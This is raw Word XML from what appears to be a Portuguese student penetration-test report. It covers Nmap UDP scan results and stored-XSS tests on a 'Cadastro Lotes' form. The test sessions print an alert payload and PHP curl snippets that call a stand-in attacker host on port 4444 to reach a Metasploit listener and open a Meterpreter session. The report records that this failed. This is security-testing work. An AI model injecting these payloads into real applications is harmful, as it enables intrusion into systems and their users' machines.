      </w:r>
      <w:r w:rsidRPr="00B15531">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, os serviços</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> que essas portas roda</w:t>
      </w:r>
      <w:r w:rsidRPr="00B15531">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>m no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D16A4" w:rsidRPr="00311F69" w:rsidRDefault="002D16A4" w:rsidP="002D16A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16A4" w:rsidRDefault="002D16A4" w:rsidP="002D16A4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  <w:highlight w:val="cyan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  <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>Relatório de execução</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D16A4" w:rsidRPr="00F15F82" w:rsidRDefault="002D16A4" w:rsidP="00AB5BB3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 xml:space="preserve">De acordo com a figura </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r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 xml:space="preserve">, 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foi possível descobrir </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">as portas abertas e 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>os serviços que estavam rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0074275B" w:rsidRPr="00F15F82" w:rsidRDefault="0074275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C5D2B" w:rsidRPr="00F15F82" w:rsidRDefault="00EC5D2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7D256C2C" wp14:editId="1FB3C833">
            <wp:extent cx="5467350" cy="3654425"/>
            <wp:effectExtent l="0" t="0" r="0" b="317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6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777DDF" w:rsidP="00052A31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Figura 14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– Portas UDP escaneadas pelo Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A66072" w:rsidRPr="00F15F82" w:rsidRDefault="00A6607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66072" w:rsidRPr="00F15F82" w:rsidRDefault="002D16A4" w:rsidP="002D16A4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rviços e</w:t>
      </w:r>
      <w:r w:rsidR="00A66072" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ncontrados na </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>figura 14</w:t>
      </w:r>
      <w:r w:rsidR="00A66072" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A66072" w:rsidRPr="00F15F82" w:rsidRDefault="00A66072" w:rsidP="0063043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2D16A4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>netbios-ns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- responsável pelo registro de nomes de aplicação do NetBios [4]; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A66072" w:rsidRPr="00F15F82" w:rsidRDefault="00A66072" w:rsidP="0063043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2D16A4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>netbios -dgm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- serviço de datagrams do NetBios ;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A66072" w:rsidRPr="00F15F82" w:rsidRDefault="00A66072" w:rsidP="0063043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2D16A4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>snmp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[5] - gerenciamento de redes;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A66072" w:rsidRPr="00F15F82" w:rsidRDefault="00A66072" w:rsidP="0063043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2D16A4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>microsoft-ds</w:t>
      </w:r>
      <w:r w:rsidR="002D16A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- protocolo windows para compartilhamento e impressões de arquivos; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00915C31" w:rsidRPr="00F15F82" w:rsidRDefault="00915C31" w:rsidP="0063043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L2TP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82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15F8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(Protocolo de Encapsulamento de Camada 2)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82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15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>[11] – Protocolo de encapsulamento da Internet, utilizado por uma conexão de VPN (rede virtual privada) para acessar uma rede privada;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A66072" w:rsidRPr="00F15F82" w:rsidRDefault="00A66072" w:rsidP="0063043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2D16A4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nat-t-like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- protocolo de tradução de ips.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A66072" w:rsidRDefault="00A66072" w:rsidP="002D16A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2835" w:hanging="351"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D16A4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ntp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[3] - protoco</w:t>
      </w:r>
      <w:r w:rsidR="002D16A4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">lo de sincronização de relógios                             </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>usando UDP;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007649FC" w:rsidRPr="00F15F82" w:rsidRDefault="007649FC" w:rsidP="007649FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="2835"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EC5D2B" w:rsidRPr="00F15F82" w:rsidRDefault="00EC5D2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7649FC" w:rsidP="007649F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4.3.3.2  XSS – Cadastro Lotes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Tarefa realizada dia 23/04/16.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82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: 1 hora e 10 minutos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Descobrir se os camp</w:t>
      </w:r>
      <w:r w:rsidR="007649FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">os da tela de Cadastro Lotes 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são vulneráveis ao ataque XSS Armazenado. </w:t>
      </w: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Sessão de teste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1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7649FC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Inserir em um dos campos o seguinte código:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D46C6B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&lt;script&gt; alert(“oi”);&lt;/script&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>no campo Marca/Fabricante</w:t>
      </w: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="0049317F" w:rsidRPr="00F15F82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:rsidR="007649FC" w:rsidRPr="00F15F82" w:rsidRDefault="007649FC" w:rsidP="007649FC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Caso a aplicação não realize um tratamento adequado dos dados inseridos, ao serem carregados pelo banco de dados, esses dados devem produzir um pop-up com o texto “oi”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D46C6B" w:rsidRPr="00F15F82" w:rsidRDefault="00D46C6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D46C6B" w:rsidRPr="00F15F82" w:rsidRDefault="00D46C6B" w:rsidP="007649FC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Pr="00F15F82" w:rsidRDefault="0049317F" w:rsidP="007649FC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iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Espera-se que haja um tratamento e esse código não seja executado quando a página carregar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649FC" w:rsidRDefault="005967D5" w:rsidP="007649FC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F15F82" w:rsidRDefault="00D76012" w:rsidP="007649FC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Cs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">O sistema </w:t>
      </w:r>
      <w:r w:rsidR="006071F5" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">não </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>passou nos testes</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82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057B33">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Conforme mostra a figura 15, f</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">oi constatado que a aplicação não está fazendo o tratamento adequado para a </w:t>
      </w:r>
      <w:r w:rsidR="0049317F" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>inserção de códigos mal-</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>intencionados nos campos da tela em questão.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC1742" w:rsidRPr="00F15F82" w:rsidRDefault="00BC174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C1742" w:rsidRPr="00F15F82" w:rsidRDefault="00BC174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Pr="00F15F82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4F141BE0" wp14:editId="517E47ED">
            <wp:extent cx="5400040" cy="3998595"/>
            <wp:effectExtent l="0" t="0" r="0" b="190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17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777DDF" w:rsidP="00057B33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Figura 15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– Resultado teste XSS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57B33" w:rsidRDefault="00057B3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11EF9" w:rsidRDefault="00211EF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C2CE7" w:rsidRDefault="00CC2CE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Sessão de teste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2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46C6B" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00CC2CE7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="708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A partir da máquina virtual que usa o Kali Linux, abrir uma conexão do </w:t>
      </w:r>
      <w:r w:rsidR="007D3513" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sistema explorado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fazendo uso de um listener da ferramenta Metasploit para acessar o sistema operacional que hospeda a aplicação.</w:t>
      </w:r>
      <w:r w:rsidR="0049317F" w:rsidRPr="00F15F8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46C6B" w:rsidRPr="00F15F82" w:rsidRDefault="00D46C6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CC2CE7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Passos utilizados:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00CC2CE7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1418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1. Utilizar o Metasploit para abrir um listener na porta 444 da máquina virtual onde o Kali Linux está hospedado, usando o exploit disponível em Auxiliary/Multi/Handler;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00CC2CE7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1418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 2. Usar um comando GET de Javascript para abrir a conexão da máquina que hospeda o </w:t>
      </w:r>
      <w:r w:rsidR="007D3513" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sistema explorado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com a máquina virtual do Kali na porta indicada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          </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00A40129" w:rsidP="00415B47">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="708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Comando a ser utilizado no XSS, o código abaixo tenta abrir uma conexão do tipo ‘GET’ com IP_do_servidor na porta 4444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211EF9">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="708"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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00211EF9">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="708"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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$curl = curl_init('http://IP_do_servidor:4444');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00211EF9">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="708"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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>curl_exec($curl);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00211EF9">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="708"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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>curl_close($curl);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00211EF9">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="708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?&gt;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Default="008C6DC7" w:rsidP="00415B47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Caso n</w:t>
      </w:r>
      <w:r w:rsidR="003E4BBF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ão haja o devido tratamento, o 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listener do Metasploit aberto na porta 444 deve criar uma conexão entre a máquina que </w:t>
      </w:r>
      <w:r w:rsidR="008A79EE" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">acessa 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a aplicação no momento e a máquina onde está o Kali Linux. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E4BBF" w:rsidRDefault="003E4BB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E4BBF" w:rsidRPr="00F15F82" w:rsidRDefault="003E4BBF" w:rsidP="003E4BBF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3E4BBF" w:rsidRPr="00F15F82" w:rsidRDefault="003E4BBF" w:rsidP="003E4BBF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esperado é que os dados passados sejam devidamente tratados na aplicação para impedir a Sessão de teste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          </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E4BBF" w:rsidRDefault="005967D5" w:rsidP="003E4BBF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F15F82" w:rsidRDefault="00D76012" w:rsidP="003E4BBF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. A sessão do Meterpreter</w:t>
      </w:r>
      <w:r w:rsidR="004D25DD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, conceito abordado no subcapítulo 3.2</w:t>
      </w:r>
      <w:r w:rsidR="007A267D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,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não foi aberta.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC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A267D" w:rsidRPr="00F15F82" w:rsidRDefault="007A267D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3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7A267D">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="708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Alterar o comando utilizado na </w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sessão de teste</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2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para tentar descobrir o que impediu a sessão do Meterpreter ser aberta.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A40129" w:rsidRPr="00F15F82" w:rsidRDefault="00A4012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46C6B" w:rsidRPr="00F15F82" w:rsidRDefault="00A40129" w:rsidP="00415B47">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="708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c</w:t>
      </w:r>
      <w:r w:rsidR="00D46C6B" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ódigo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abaixo tenta abrir uma conexão com o IP_do_servidor na porta 4444 e caso haja u erro exibe o problema num pop-up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415B47">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="708"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F15F82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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00415B47">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="708"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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$curl = curl_init('http://IP_do_servidor:4444');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00415B47">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="708"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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if(!curl_exec($curl)){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00415B47">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="708"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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>javascript:alert(curl_error($curl));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00415B47">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="708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}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00415B47">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="708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curl_close($curl);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00415B47">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="708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?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00415B47" w:rsidRDefault="00415B47" w:rsidP="00415B47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15B47" w:rsidRPr="00F15F82" w:rsidRDefault="00415B47" w:rsidP="00415B47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415B47" w:rsidRPr="00F15F82" w:rsidRDefault="00415B47" w:rsidP="00415B47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aplicação </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">deve </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>reali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>zar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o tratamento para impedir o comando de ser executado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5967D5" w:rsidP="00415B47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F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00415B47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Cs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Não foi possível armazenar o comando usado no ataque, porque o tamanho limite permitido na base de dados da aplicação para o campo utilizado no teste é menor que a quantidade de caracteres utilizados do comando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4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E2559" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00E31790">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="708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Ao contrário das demais </w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sessão de teste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s que utilizavam códigos php, aqui foram utilizados códigos de Javascript puro, que os navegadores conseguem ler. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00537F7B" w:rsidP="00E31790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código abaixo cria um objeto do tipo XMLHttpReques</w:t>
      </w:r>
      <w:r w:rsidR="006E2559" w:rsidRPr="00F15F82">
        <w:rPr>
